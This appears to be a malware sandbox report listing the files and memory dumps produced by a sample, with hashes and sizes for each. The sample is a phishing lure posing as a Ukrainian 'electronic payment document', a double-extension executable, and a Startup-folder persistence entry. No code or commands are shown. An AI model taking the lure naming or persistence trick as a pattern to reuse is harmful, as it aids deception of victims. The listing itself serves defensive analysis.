87a098088638691cfe3f38c18c52a30b8e23339eae16cd7b86241e5f0eb1cf381921cef0ffb9349d6825605bf4d5a9683b3eb9e4ff5263c1dbbf11d55a5c2cfb

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES5D5D.tmp

Filesize
1KB

MD5
2ef442b854e80d8af7d6a38c0844feaf

SHA1
2aa6d0aecbc87c93d21a3bd59e42cb66b6f6d58f

SHA256
8f3c1e337d044b5752a77fa2b5657b21fcc6e4b4462c79fc19d677db88f881e6

SHA512
940ef3329296a14fc989118a8cf8e005ac41754d59957ea44a19872fbb314d6f49d21f34e8d88fd664c0ac04e5e29b3d558d5c9c51f23c71e7bf38c7dbe48df7

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES6B09.tmp

Filesize
1KB

MD5
af0178a336f6e208edc762436170280d

SHA1
9d01b3a3153131f92ca0a617c61ab74524d07ed9

SHA256
10422ea0ec8f65668705cdf0f739d2acfc9619383afbdb5b04646f71737e5822

SHA512
842471f73fde6ff136505ad4c5e0d1041f05a9b7316cdf75fc3a3173d84ba2254acc2c7e270ec8cf0f463a5ef8ade9eff21ccae36e8d4d70a9002cbc8c960997

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tflajy4a.ohh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ivpnwwdq\ivpnwwdq.dll

Filesize
4KB

MD5
c2d9426eef812eb523eb4522d55cc8cd

SHA1
d28359f3d7958eef404f580d29395e92ce0d1020

SHA256
86106297a854e8a0827fd864d1baf98df2003338b9455035b3d4aa6171a9f96a

SHA512
3d23e48f495614718bd17b7660d0f765e79047ab6b3ee127440324dd180b687679449440d795e0f3cfedac131cccc47cdd48e0cfa58daa11ba5ce66ca96915c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\rvcva2xn\rvcva2xn.dll

Filesize
8KB

MD5
3dbe85d21add72eb3e3e6e24dbc6b6e0

SHA1
b3a97389e2d4541f1df2c88a4931f5436e1bd1e6

SHA256
c22221bc4c3d51fc04f62b166983a72cfbf5474e70824c418cf0d02cda7466df

SHA512
4f93c95b719d418a21353cf92fd1323d50bded6874b1428ae4ac0fdc6dfb0d6dbbbb286660dd02e6c25df4e659eec78c37b657504925b93302e58bed82011b7e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url

Filesize
63B

MD5
c059b79ea488ae8514ba35a61154df12

SHA1
5381eb77b79d0ee8d3ddf0eb6b4308e39e581b42

SHA256
3fbe0ece0ea4b1914c53a205802276432c90c4ef38cd22606cfeb77bc6840a8b

SHA512
fb815af9485a1e58eaa6ed01694b2b56f2c6278cfedf18b5880fda1503d577599513d01d1fb7070508461ef45929a45b7a7d2a32bd506c24479f097513073ab2

Download Submit
C:\Users\Admin\Downloads\Електронний платіжний документ.zip

Filesize
71KB

MD5
a7d1fdf448b0c018b4659596ab31f1b4

SHA1
1f41416f54a6f4d77e1adcfd50af9b86f62ff5e6

SHA256
3114a656c50b699926ccc4ba8257e2e1b468d9867e203791d046953b0eb50bb2

SHA512
db6b96d9bc482bedebf7e78d42f7746c347d85976f1c81d92b0f4c2401167785783546c2b614ab87f5c2b56fa5d61af34d192c0f67e1929555a5b13bb9827063

Download Submit
C:\Users\Admin\Downloads\Електронний платіжний документ\Електронний платіжний документ\Електронний платіжний документ\iviewers.dll

Filesize
9KB

MD5
3e19af75ad476c6a9e0d9f639362575c

SHA1
98fd904e8076cf47a3349f985b8c8f63f9edd533

SHA256
f0123ba9249104cd80a3cdd5c050ba8762c13a939f2f9fa2c1c3d2fe3ea8238b

SHA512
c800e41fb2665c022268fb871831b1883116563c91a29d4f2890523a8d86fbde9bb33ef73fd6140400cf18de7a1b87f375a6e79894b253ae31f773c2495c4fca

Download Submit
C:\Users\Admin\Downloads\Електронний платіжний документ\Електронний платіжний документ\Електронний платіжний документ\Електронний платіжний документ.pdf.exe

Filesize
201KB

MD5
2696d944ffbef69510b0c826446fd748

SHA1
e4106861076981799719876019fe5224eac2655c

SHA256
a4f53964cdddcccbd1b46da4d3f7f5f4292b5dd11c833d3db3a1e7def36da69a

SHA512
c286bc2da757cbb2a28cf516a4a273dd11b15f674d5f698a713dc794f013b7502a8893ab6041e51bab3cdd506a18c415b9df8483b19e312f8fcb88923f42b8eb

Download Submit
C:\Windows\Temp\DeleteApp.bat

Filesize
3KB

MD5
edbf70de747ba01bdb2e4d5d97ea6a31

SHA1
a94f3166d0a84d80ab6eb1983f7a388a23385a40

SHA256
c51450934b1b7f2ab3325fc9779bd1fb52c95b726172ffe601b35aea7a85a41c

SHA512
5c108018e11b44b544add7e3d6a91dbbb27ebab07e398a1265373e413886f327a2936bc9c799a228f0c858876c04f8994e0e9d822556502357abf81f5564ab6d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ivpnwwdq\CSC673D2C52A045453AA51B3EBA891B1164.TMP

Filesize
652B

MD5
107a5d09fe18d9a4573a8f84a4ff42d1

SHA1
3d2a2adf7a8c352a5d04e1cbed1f0cebb16645e1

SHA256
90e65d04bd645d44e35374904d7be5e2d253f6c812e91933ae2138be14fda7d1

SHA512
45e24a0976ce7911e9eff86ebde8ecad27061719a25030ec9c0bc50b614a4455ad86abe74fa586b250b3a45af10f498c45edacd77fd1e1f7f32e04b52b170891

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ivpnwwdq\ivpnwwdq.0.cs

Filesize
1KB

MD5
fbe98abf0fa0d22b2b990d481f0796da

SHA1
63c52ca6971a37884e7d57b9c3272e6e1f916838

SHA256
c170e9c750041bbd8c7306e5dec6d7b87a808e452ec074b4d7325981c575f5b9

SHA512
0a64e5f33829c2cf0700428fc22fed00d21230a3545a095a62fc0fd93d43fd8a755558ed66e79e0befa0d5844db3a838d9ab5ffb5c8e7dd2c4327ddadc943105

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ivpnwwdq\ivpnwwdq.cmdline

Filesize
183B

MD5
a227bfa7558912115682e0f4fc86c556

SHA1
b34e4a35606ee91353df7a38d01aa836e7eb2c26

SHA256
f507c55f15978d939d4429798492c378476585572364fabac1c6d0ccf80d70c3

SHA512
2348d34e168d763b3dd302af91b79b78207259931ae09bc8bfb9ad1f71c40c87a75f77acfbb0a882d5c0f3ee7df47c0b64ea84d47cbee1ae8633b793c7f3e28f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rvcva2xn\CSCC3223E4CE63B414A82359EFECC1CB84D.TMP

Filesize
652B

MD5
9a431f38c0e18d3de84f3cc4d37bff61

SHA1
a05ce027307d6d1026521b74d357b16a0399f3c3

SHA256
a0bc55392a6439b5e5162efeffd92ce9de7c697ccf1662c321baad419dac4097

SHA512
7ae8c4ec13dc11e0b3445a289fc38f1db0047de54ca19f804e041278dc9041aebb61975a1e5d4001648d0d17cac402d9c91e0257f0a7e21caec6803589f8a96d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rvcva2xn\rvcva2xn.0.cs

Filesize
10KB

MD5
b022c6fe4494666c8337a975d175c726

SHA1
8197d4a993e7547d19d7b067b4d28ebe48329793

SHA256
d02016a307b3e8da1a80c29551d44c17358910816e992bc1b53da006d62dd56a

SHA512
df670235e87b1ee957086be88731b458c28629e65e052276dd543be273030986a7e5c67fa83587f68ec06fa0f33b0c3f1f041c2d06073709b340f96c3884f2b9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rvcva2xn\rvcva2xn.cmdline

Filesize
204B

MD5
df41c9abc4cbfbbca9f02e9da06ac190

SHA1
c0cde5c2c4f03d4d04749310470bdf2c719cc443

SHA256
550fdcfe602ff34c5c957c18ac6d42d85ffdd94a871fbea91e8a12ecb5101c81

SHA512
f859744c9f3196fb3f8a66e7b0e505216d32a3db5cebecbf0bbb121fbb3f806a241a53e986d1f58ec352e1210db087157b9645046c8d376dc7958fe83869d9ac

Download Submit
memory/388-759-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/388-681-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/388-744-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/388-742-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/388-707-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/388-729-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/388-727-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/388-746-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/388-724-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/388-749-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/388-750-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/388-754-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/388-757-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/388-762-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/388-723-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/388-674-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/388-675-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/388-745-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/388-682-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/388-678-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/388-677-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/388-685-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/388-687-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/388-689-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/388-722-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/388-720-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/388-764-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/388-715-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/388-713-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/388-712-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/388-710-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/388-709-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/388-756-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/768-699-0x00000149FDB70000-0x00000149FDB71000-memory.dmp

Filesize
4KB

Download
memory/768-698-0x00000149FDB70000-0x00000149FDB71000-memory.dmp

Filesize
4KB

Download
memory/768-700-0x00000149FDB70000-0x00000149FDB71000-memory.dmp

Filesize
4KB

Download
memory/768-701-0x00000149FDB70000-0x00000149FDB71000-memory.dmp

Filesize
4KB

Download
memory/768-702-0x00000149FDB70000-0x00000149FDB71000-memory.dmp

Filesize
4KB

Download
memory/768-703-0x00000149FDB70000-0x00000149FDB71000-memory.dmp

Filesize
4KB

Download
memory/768-704-0x00000149FDB70000-0x00000149FDB71000-memory.dmp

Filesize
4KB

Download
memory/768-693-0x00000149FDB70000-0x00000149FDB71000-memory.dmp

Filesize
4KB

Download
memory/768-694-0x00000149FDB70000-0x00000149FDB71000-memory.dmp

Filesize
4KB

Download
memory/768-692-0x00000149FDB70000-0x00000149FDB71000-memory.dmp

Filesize
4KB

Download
memory/2500-672-0x0000000007C20000-0x0000000007C28000-memory.dmp

Filesize
32KB

Download
memory/2500-659-0x0000000007A60000-0x0000000007A72000-memory.dmp

Filesize
72KB

Download
memory/2500-658-0x0000000007960000-0x000000000797A000-memory.dmp

Filesize
104KB

Download
memory/2500-657-0x0000000007FE0000-0x000000000865A000-memory.dmp

Filesize
6.5MB

Download
memory/2500-656-0x00000000076B0000-0x0000000007726000-memory.dmp

Filesize
472KB

Download
memory/2500-655-0x0000000007550000-0x0000000007594000-memory.dmp

Filesize
272KB

Download
memory/2500-654-0x0000000006680000-0x00000000066CC000-memory.dmp

Filesize
304KB

Download
memory/2500-653-0x00000000065E0000-0x00000000065FE000-memory.dmp

Filesize
120KB

Download
memory/2500-652-0x0000000005FE0000-0x0000000006334000-memory.dmp

Filesize
3.3MB

Download
memory/2500-641-0x00000000058A0000-0x0000000005906000-memory.dmp

Filesize
408KB

Download
memory/2500-642-0x0000000005F70000-0x0000000005FD6000-memory.dmp

Filesize
408KB

Download
memory/2500-640-0x0000000005600000-0x0000000005622000-memory.dmp

Filesize
136KB

Download
memory/2500-639-0x0000000005940000-0x0000000005F68000-memory.dmp

Filesize
6.2MB

Download
memory/2500-638-0x0000000003010000-0x0000000003046000-memory.dmp

Filesize
216KB

Download
memory/5728-632-0x0000000003290000-0x0000000003298000-memory.dmp

Filesize
32KB

Download
memory/5728-610-0x0000000007D20000-0x0000000007DB2000-memory.dmp

Filesize
584KB

Download
memory/5728-609-0x0000000008230000-0x00000000087D4000-memory.dmp

Filesize
5.6MB

Download
memory/5728-608-0x0000000075000000-0x000000007500A000-memory.dmp

Filesize
40KB

Download
memory/5728-607-0x0000000005770000-0x000000000577A000-memory.dmp

Filesize
40KB

Download